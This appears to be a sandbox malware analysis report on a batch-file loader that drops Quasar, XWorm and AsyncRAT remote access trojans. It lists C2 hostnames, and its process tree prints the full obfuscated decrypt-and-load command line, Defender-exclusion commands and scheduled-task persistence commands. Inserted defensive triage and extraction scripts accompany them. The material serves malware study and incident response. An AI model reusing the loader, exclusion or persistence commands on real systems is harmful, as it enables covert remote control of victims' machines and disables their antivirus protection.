Analysis

  • max time kernel
    150s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    15-07-2024 16:14

General

  • Target

    zvgfd-main/Part 1.bat

  • Size

    580KB

  • MD5

    8b844b2b29752a8a1c62efaa59dba4be

  • SHA1

    0c467148d558c4b7d6672d5b26a79af5f7fb96d4

  • SHA256

    ccb4ad561b87927edd97a02436014944c9147fe78934d2a26de73c7ee1704d0d

  • SHA512

    e086dfb88842e19c552ec00d989ae453743cabeddae93359cde6afc62354042d6ab366039e71819ad0a79319fb17ce98ec77bafb31f6183ba8a87cbb2c1df8a0

  • SSDEEP

    12288:dgOsRaPeA/fpkyocgcQwO57n+2HCZ/ySemGKDuE2wROnCFkw:dAcbBkBJwy+2HCESoZy

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Extracted

Family

xworm

C2

super-nearest.gl.at.ply.gg:17835

best-bird.gl.at.ply.gg:27196

wiz.bounceme.net:6000

Attributes
  • Install_directory

    %ProgramData%

  • aes.plain

Extracted

Family

asyncrat

Botnet

Default

C2

finally-grande.gl.at.ply.gg:25844

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

  • aes.plain

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

stop-largely.gl.at.ply.gg:27116

Mutex

$Sxr-kl1r656AGsPQksTmi8

Attributes
  • encryption_key

    WyBm1iVkHZmEnGPMAZWV

  • install_name

    $phantom.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    $phantomSTARTUP~MSF

  • subdirectory

    $phantom

Signatures

  • AsyncRat

    AsyncRAT is a remote access tool written in C#, designed to remotely monitor and control other computers.

  • Detect Xworm Payload 5 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 3 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Runs PowerShell with its display window hidden (-w hidden).

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely a geofencing check.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
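
The signatures above (scheduled task, Run key, startup file dropped, Defender exclusions added with Add-MpPreference in the process tree) are the host artefacts a responder would look for first. The following triage script is an added example and not part of this sandbox report: it enumerates scheduled tasks, Defender exclusions, Run keys and the dropped-file paths recorded in the process tree below. The task names, exclusion targets and file paths are the ones recorded in this report; the generic heuristics (actions launched from user-writable directories, one-minute repetition, script files as task actions) and the function names are the example's own assumptions.

```powershell
# Added example, not part of the sandbox report: host triage for the persistence
# and Defender-tampering artefacts recorded in the process tree. Run elevated,
# since exclusions and HKLM Run keys may not be readable otherwise.
# Task names, exclusion targets and dropped-file paths come from the report;
# the heuristics (user-writable paths, one-minute repetition) are generic.
$KnownTaskNames = @('Part 4', 'WINDOWSBIOS', '$phantomSTARTUP~MSF', 'Windows_Log_10_str')
$UserWritable   = '(?i)\\(ProgramData|AppData|Temp)\\'

function Get-SuspiciousScheduledTasks {
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in @($task.Actions)) {
            $exe = [string]$action.Execute
            $why = @()
            if ($KnownTaskNames -contains $task.TaskName.Trim()) { $why += 'task name seen in this sample' }
            if ($exe -match $UserWritable)                       { $why += 'action runs from user-writable path' }
            if ($exe -match '(?i)\.(vbs|bat|cmd|js)$')            { $why += 'action is a script' }
            # schtasks /sc minute /mo 1 is stored as a repetition interval of PT1M.
            foreach ($trigger in @($task.Triggers)) {
                if ($trigger.Repetition -and $trigger.Repetition.Interval -eq 'PT1M') { $why += 'repeats every minute' }
            }
            if ($why.Count -gt 0) {
                [PSCustomObject]@{ Task = $task.TaskName; Execute = $exe; Arguments = $action.Arguments; Why = ($why -join '; ') }
            }
        }
    }
}

function Get-SuspiciousDefenderExclusions {
    $pref = Get-MpPreference
    foreach ($p in @($pref.ExclusionPath)) {
        # Excluding powershell.exe itself or anything under a user-writable directory is a red flag.
        if ($p -match $UserWritable -or $p -match '(?i)\\powershell\.exe$') { [PSCustomObject]@{ Type = 'Path'; Value = $p } }
    }
    foreach ($p in @($pref.ExclusionProcess)) {
        # Process exclusions are rare in legitimate configurations; report every one.
        if ($p) { [PSCustomObject]@{ Type = 'Process'; Value = $p } }
    }
}

function Get-SuspiciousRunKeys {
    $keys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-ItemProperty -Path $key
        foreach ($name in $item.PSObject.Properties.Name) {
            if ($name -like 'PS*') { continue }            # PSPath, PSParentPath, ... are provider metadata
            $command = [string]$item.$name
            if ($command -match $UserWritable) { [PSCustomObject]@{ Key = $key; Name = $name; Command = $command } }
        }
    }
}

function Get-DroppedFiles {
    # Paths recorded in the report's process tree and Downloads list.
    $candidates = "$env:ProgramData\Part 4.exe", "$env:ProgramData\WINDOWSBIOS .COM",
                  "$env:APPDATA\Windows_Log_10.bat", "$env:APPDATA\Windows_Log_10.vbs"
    foreach ($file in $candidates) {
        if (Test-Path -LiteralPath $file) { Get-FileHash -Algorithm SHA256 -LiteralPath $file }
    }
}

Get-SuspiciousScheduledTasks     | Format-Table -AutoSize
Get-SuspiciousDefenderExclusions | Format-Table -AutoSize
Get-SuspiciousRunKeys            | Format-Table -AutoSize
Get-DroppedFiles                 | Format-Table -AutoSize
```

When cleaning up, remove the tasks (Unregister-ScheduledTask -TaskName ... -Confirm:$false) before deleting the binaries, because the "Part 4" and "WINDOWSBIOS " tasks re-launch their targets every minute; then revert the exclusions with Remove-MpPreference -ExclusionPath / -ExclusionProcess, since a path exclusion on powershell.exe and %ProgramData% leaves Defender blind to any re-infection.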

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 1.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3284
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uMhFm9Heyf0m35R7TqcwatHx8y7t/S5Yp9g45Hv0RJQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cYkB+WZDehKcJNABs1GBow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dLVmD=New-Object System.IO.MemoryStream(,$param_var); $PrWUn=New-Object System.IO.MemoryStream; $NtSFg=New-Object System.IO.Compression.GZipStream($dLVmD, [IO.Compression.CompressionMode]::Decompress); $NtSFg.CopyTo($PrWUn); $NtSFg.Dispose(); $dLVmD.Dispose(); $PrWUn.Dispose(); $PrWUn.ToArray();}function execute_function($param_var,$param2_var){ $TQPiU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iqsry=$TQPiU.EntryPoint; $iqsry.Invoke($null, $param2_var);}$qcgQF = 'C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 1.bat';$host.UI.RawUI.WindowTitle = $qcgQF;$XDAmi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($qcgQF).Split([Environment]::NewLine);foreach ($jksJC in $XDAmi) { if ($jksJC.StartsWith('JTCOZdwpBOYBkUChqpKD')) { $HLFxX=$jksJC.Substring(20); break; }}$payloads_var=[string[]]$HLFxX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
        PID:2784
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2312
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_10_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_10.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4072
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_10.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4128
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_10.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1824
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uMhFm9Heyf0m35R7TqcwatHx8y7t/S5Yp9g45Hv0RJQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cYkB+WZDehKcJNABs1GBow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dLVmD=New-Object System.IO.MemoryStream(,$param_var); $PrWUn=New-Object System.IO.MemoryStream; $NtSFg=New-Object System.IO.Compression.GZipStream($dLVmD, [IO.Compression.CompressionMode]::Decompress); $NtSFg.CopyTo($PrWUn); $NtSFg.Dispose(); $dLVmD.Dispose(); $PrWUn.Dispose(); $PrWUn.ToArray();}function execute_function($param_var,$param2_var){ $TQPiU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iqsry=$TQPiU.EntryPoint; $iqsry.Invoke($null, $param2_var);}$qcgQF = 'C:\Users\Admin\AppData\Roaming\Windows_Log_10.bat';$host.UI.RawUI.WindowTitle = $qcgQF;$XDAmi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($qcgQF).Split([Environment]::NewLine);foreach ($jksJC in $XDAmi) { if ($jksJC.StartsWith('JTCOZdwpBOYBkUChqpKD')) { $HLFxX=$jksJC.Substring(20); break; }}$payloads_var=[string[]]$HLFxX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
              5⤵
                PID:4492
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1008
                • C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 4.exe
                  "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 4.exe"
                  6⤵
                  • Checks computer location settings
                  • Drops startup file
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:4772
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 4.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4764
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Part 4.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2492
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Part 4.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2432
                  • C:\Windows\System32\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Part 4" /tr "C:\ProgramData\Part 4.exe"
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3640
                • C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 3.exe
                  "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 3.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:4400
                • C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 2.exe
                  "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 2.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:3916
                  • C:\Windows\SysWOW64\schtasks.exe
                    "schtasks" /create /tn "$phantomSTARTUP~MSF" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 2.exe" /rl HIGHEST /f
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:1712
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3192
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1480
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WINDOWSBIOS .COM'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5112
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WINDOWSBIOS .COM'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:224
                • C:\Windows\System32\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WINDOWSBIOS " /tr "C:\ProgramData\WINDOWSBIOS .COM"
                  6⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:3404
      • C:\ProgramData\Part 4.exe
        "C:\ProgramData\Part 4.exe"
        1⤵
        • Executes dropped EXE
        PID:1700
      • C:\ProgramData\Part 4.exe
        "C:\ProgramData\Part 4.exe"
        1⤵
        • Executes dropped EXE
        PID:1580
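
The command line captured at PID 2784 shows how the .bat stages its payloads: cmd.exe echoes a PowerShell script into a hidden powershell.exe (PID 2312), which re-reads the .bat, takes the first line beginning with the 20-character marker JTCOZdwpBOYBkUChqpKD, splits the remainder on '\', reverses a two-character substitution ('#' back to '/', '@' back to 'A'), Base64-decodes, AES-CBC/PKCS7-decrypts with the hard-coded key and IV, GZip-inflates, and finally passes each blob to Assembly.Load and invokes its entry point. The copy written to %AppData%\Windows_Log_10.bat and re-run at logon through Windows_Log_10.vbs is byte-identical to Part 1.bat (same SHA256 in the Downloads list). The extractor below is an added example and not part of this report or the loader: it repeats the same chain offline with the key, IV and marker taken from the captured command line, but writes the decoded blobs to disk instead of loading them. The sample .bat, the fake payload bytes, the output directory and the function names are constructed for the demonstration.

```powershell
# Added example, not part of the sandbox report: an offline extractor for the
# batch-file loader seen at PID 2784/2312. It repeats the loader's own chain
# (marker line -> split on '\' -> undo '#'->'/' and '@'->'A' -> Base64 ->
# AES-CBC/PKCS7 -> GZip) but writes the decoded blobs to disk instead of
# handing them to [Reflection.Assembly]::Load.
# Key, IV and marker are the values visible in the captured command line.
$Key    = [Convert]::FromBase64String('uMhFm9Heyf0m35R7TqcwatHx8y7t/S5Yp9g45Hv0RJQ=')
$IV     = [Convert]::FromBase64String('cYkB+WZDehKcJNABs1GBow==')
$Marker = 'JTCOZdwpBOYBkUChqpKD'

function ConvertFrom-LoaderChunk {
    param([Parameter(Mandatory)][string]$Chunk)
    # Reverse the two-character substitution, then Base64-decode.
    $cipherText = [Convert]::FromBase64String($Chunk.Replace('#', '/').Replace('@', 'A'))
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = $Key
    $aes.IV  = $IV
    $decryptor  = $aes.CreateDecryptor()
    $compressed = $decryptor.TransformFinalBlock($cipherText, 0, $cipherText.Length)
    $decryptor.Dispose(); $aes.Dispose()
    # GZip-inflate the decrypted buffer.
    $inStream  = New-Object System.IO.MemoryStream(,$compressed)
    $outStream = New-Object System.IO.MemoryStream
    $gzip = New-Object System.IO.Compression.GZipStream($inStream, [System.IO.Compression.CompressionMode]::Decompress)
    $gzip.CopyTo($outStream)
    $gzip.Dispose(); $inStream.Dispose()
    $plain = $outStream.ToArray()
    $outStream.Dispose()
    return ,$plain
}

function New-LoaderChunk {
    # Inverse of ConvertFrom-LoaderChunk; used only to build the constructed sample below.
    param([Parameter(Mandatory)][byte[]]$Plain)
    $buffer = New-Object System.IO.MemoryStream
    $gzip = New-Object System.IO.Compression.GZipStream($buffer, [System.IO.Compression.CompressionMode]::Compress)
    $gzip.Write($Plain, 0, $Plain.Length)
    $gzip.Dispose()                      # flushes and closes $buffer; ToArray() still works afterwards
    $compressed = $buffer.ToArray()
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = $Key
    $aes.IV  = $IV
    $encryptor  = $aes.CreateEncryptor()
    $cipherText = $encryptor.TransformFinalBlock($compressed, 0, $compressed.Length)
    $encryptor.Dispose(); $aes.Dispose()
    return [Convert]::ToBase64String($cipherText).Replace('/', '#').Replace('A', '@')
}

function Export-LoaderPayloads {
    param([Parameter(Mandatory)][string]$BatPath,
          [Parameter(Mandatory)][string]$OutDir)
    # The loader reads the whole file and uses the first line that starts with the marker.
    $line = Get-Content -LiteralPath $BatPath | Where-Object { $_.StartsWith($Marker) } | Select-Object -First 1
    if (-not $line) { throw "No line starting with marker '$Marker' in $BatPath" }
    New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
    $index = 0
    foreach ($chunk in $line.Substring($Marker.Length).Split('\')) {
        $index++
        $bytes = ConvertFrom-LoaderChunk -Chunk $chunk
        $dest  = Join-Path $OutDir ('payload{0}.bin' -f $index)
        [System.IO.File]::WriteAllBytes($dest, $bytes)
        [PSCustomObject]@{
            Index       = $index
            Bytes       = $bytes.Length
            # The loader feeds each blob to Assembly.Load, so a real one starts with 'MZ'.
            LooksLikePE = ($bytes.Length -ge 2 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A)
            SHA256      = (Get-FileHash -Algorithm SHA256 -LiteralPath $dest).Hash
            Path        = $dest
        }
    }
}

# Constructed sample (not real malware): two fake blobs wrapped exactly like the captured loader line.
$fake1  = [System.Text.Encoding]::ASCII.GetBytes('MZ fake assembly one')
$fake2  = [System.Text.Encoding]::ASCII.GetBytes('MZ fake assembly two')
$tmp    = [System.IO.Path]::GetTempPath()
$sample = Join-Path $tmp 'constructed_loader.bat'
@('@echo off', ($Marker + (New-LoaderChunk -Plain $fake1) + '\' + (New-LoaderChunk -Plain $fake2))) |
    Set-Content -LiteralPath $sample -Encoding ASCII
Export-LoaderPayloads -BatPath $sample -OutDir (Join-Path $tmp 'loader_payloads') | Format-Table -AutoSize
```

Point Export-LoaderPayloads at Part 1.bat (or the identical Windows_Log_10.bat) to recover the two .NET assemblies for static analysis; the recovered files should be checked against the Part 2/3/4 hashes in the Downloads list, and the key and IV will need updating for other builds of the same loader.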

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Part 4.exe.log

        Filesize

        654B

        MD5

        2ff39f6c7249774be85fd60a8f9a245e

        SHA1

        684ff36b31aedc1e587c8496c02722c6698c1c4e

        SHA256

        e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

        SHA512

        1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        661739d384d9dfd807a089721202900b

        SHA1

        5b2c5d6a7122b4ce849dc98e79a7713038feac55

        SHA256

        70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

        SHA512

        81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        2KB

        MD5

        005bc2ef5a9d890fb2297be6a36f01c2

        SHA1

        0c52adee1316c54b0bfdc510c0963196e7ebb430

        SHA256

        342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

        SHA512

        f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        8f02e6be4668f376a39c77eeda0fe2ad

        SHA1

        3c0706c343ce551c87060ef4f074a815b2ca592a

        SHA256

        68758460e91fb9dc1285782c1a5df62016bcffffdb16aeb8ad5903ec6b2721b2

        SHA512

        5229b5e9052ee5a62b0c1492abef8887c1f2050be1b4ac2a1e397afc8d8c2dad660faf55fd8084da16a68576951495d7c550fc4a765671e296435043405ec63c

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        6d3e9c29fe44e90aae6ed30ccf799ca8

        SHA1

        c7974ef72264bbdf13a2793ccf1aed11bc565dce

        SHA256

        2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

        SHA512

        60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        15dde0683cd1ca19785d7262f554ba93

        SHA1

        d039c577e438546d10ac64837b05da480d06bf69

        SHA256

        d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

        SHA512

        57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        0256bd284691ed0fc502ef3c8a7e58dc

        SHA1

        dcdf69dc8ca8bf068f65d20ef1563bbe283e2413

        SHA256

        e2fb83098e114084f51ed7187334f861ce670051046c39f338928296ca9a49cf

        SHA512

        c5b29c1e0a15ddb68b0579848066774fa7cdc6f35087bbbf47c05a5c0dcc1eb3e61b2ddadfbded8c1ed9820e637596a9f08a97db8fb18000d168e6b159060c42

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ef40wow.e3z.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 2.exe

        Filesize

        409KB

        MD5

        301613f1fcda48ebade4c197175be1a0

        SHA1

        03f58ab72f3c2d991418861adfc9c3b3289640a0

        SHA256

        1772f8bfc84772485e5b2388bb8942c28a9f2803a5f879e275d9b9d3eb923d41

        SHA512

        375c55fc09f1f0ef1a394b57f38916f103c36aaf8f4ec9a6939dcfaf147ebc3121537f2ebe1061b3851043dd44001f0a6630abe8e32549bf95d3e12f81308525

      • C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 3.exe

        Filesize

        63KB

        MD5

        ec57b49d155e05d971f73e2eb3d3d01f

        SHA1

        f8537e9b44342a71f1f8bf48548b27574f17ff7c

        SHA256

        baf3237f6c2b6c49ca7572213bc72f0dea9a4afcd37f90ea2d13a542d83d2a9c

        SHA512

        e27191657d4339d44dfb32a637efe1168d57520ee1c320dc7997f8944c627595e66abe72ed5039f005b01e2e2d1a5ca9df7c5a10ad0092305c07dd64f29ff533

      • C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 4.exe

        Filesize

        81KB

        MD5

        6fac9c3612488908d9aa6ed9e8234f9f

        SHA1

        8b36017162e06e76a450e2ecceee4d3a68bb3905

        SHA256

        0ca49b53ed70a9fabe46a92daa4a134f1afaf99b9098f81e33084a95c8586606

        SHA512

        e71b4cef4f488fc2cc771c1df5466ed6edd12d5cf3bfcf2825f0ec87bbcb66afabcba957dbfeee621e3c03e897bec1cede8d88f3c9e255b4fd40ddbdfaa5794e

      • C:\Users\Admin\AppData\Roaming\Windows_Log_10.bat

        Filesize

        580KB

        MD5

        8b844b2b29752a8a1c62efaa59dba4be

        SHA1

        0c467148d558c4b7d6672d5b26a79af5f7fb96d4

        SHA256

        ccb4ad561b87927edd97a02436014944c9147fe78934d2a26de73c7ee1704d0d

        SHA512

        e086dfb88842e19c552ec00d989ae453743cabeddae93359cde6afc62354042d6ab366039e71819ad0a79319fb17ce98ec77bafb31f6183ba8a87cbb2c1df8a0

      • C:\Users\Admin\AppData\Roaming\Windows_Log_10.vbs

        Filesize

        114B

        MD5

        20b518604f4c00f6aff85a64f7e8fe67

        SHA1

        61363d479a856f9489a8dfaa8d9e538218e9f9b4

        SHA256

        4bdf05cc938790a2fc459be1f10865aa120826a745702c3fe2b582451930f368

        SHA512

